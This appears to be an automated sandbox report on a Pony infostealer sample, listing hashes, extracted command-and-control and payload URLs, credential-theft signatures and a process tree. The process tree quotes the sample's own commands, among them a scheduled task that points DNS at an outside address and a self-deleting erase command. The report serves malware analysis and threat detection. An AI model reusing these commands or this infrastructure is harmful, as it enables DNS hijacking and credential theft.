Analysis
-
max time kernel
91s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2022, 08:34
Static task
static1
Behavioral task
behavioral1
Sample
66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
Resource
win7-20221111-en
General
-
Target
66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
-
Size
81KB
-
MD5
1535bd3f07b9163e3f8c1105318e4fa0
-
SHA1
bd6a3c48c57af869ab047d677b2e12623da2b2cf
-
SHA256
66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c
-
SHA512
d7388ec2678bc18ba54b580611898d7d7f433c7396d6bd81f51aeabfc53e530b1826593554204def38f1242c301badc5d064d9e61451d1b52fffe48572b7c5d5
-
SSDEEP
1536:BpAe/akMDYbcHmCPEY1Bh6OGYtl2ajXLB0M/3kIhG496yUBx7Vx1Q:BpAe/akMlmXYfgXYtxDmk3dhp2x7zy
Malware Config
Extracted
pony
http://voladex.pw:36/fix/mark.php
http://bolakes.pw:36/fix/refer.php
http://camtest33.pw:36/fix/symbols.php
-
payload_url
http://camtest3.pw:36/fix/Sonar.exe
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 988 set thread context of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\calc2.exe 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 3888 988 WerFault.exe 78 2276 988 WerFault.exe 78 4528 988 WerFault.exe 78 2496 988 WerFault.exe 78 -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2284 PING.EXE -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeImpersonatePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 988 wrote to memory of 1872 988 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 86 PID 1872 wrote to memory of 4576 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 96 PID 1872 wrote to memory of 4576 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 96 PID 1872 wrote to memory of 4576 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 96 PID 4576 wrote to memory of 2288 4576 cmd.exe 98 PID 4576 wrote to memory of 2288 4576 cmd.exe 98 PID 4576 wrote to memory of 2288 4576 cmd.exe 98 PID 1872 wrote to memory of 3672 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 99 PID 1872 wrote to memory of 3672 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 99 PID 1872 wrote to memory of 3672 1872 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 99 PID 3672 wrote to memory of 2284 3672 cmd.exe 101 PID 3672 wrote to memory of 2284 3672 cmd.exe 101 PID 3672 wrote to memory of 2284 3672 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 3082⤵
- Program crash
PID:3888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 3282⤵
- Program crash
PID:2276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 3362⤵
- Program crash
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c at 09:37:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")3⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\at.exeat 09:37:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")4⤵PID:2288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost4⤵
- Runs ping.exe
PID:2284
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 3202⤵
- Program crash
PID:2496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 988 -ip 9881⤵PID:2424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 988 -ip 9881⤵PID:960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 988 -ip 9881⤵PID:4620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 988 -ip 9881⤵PID:4552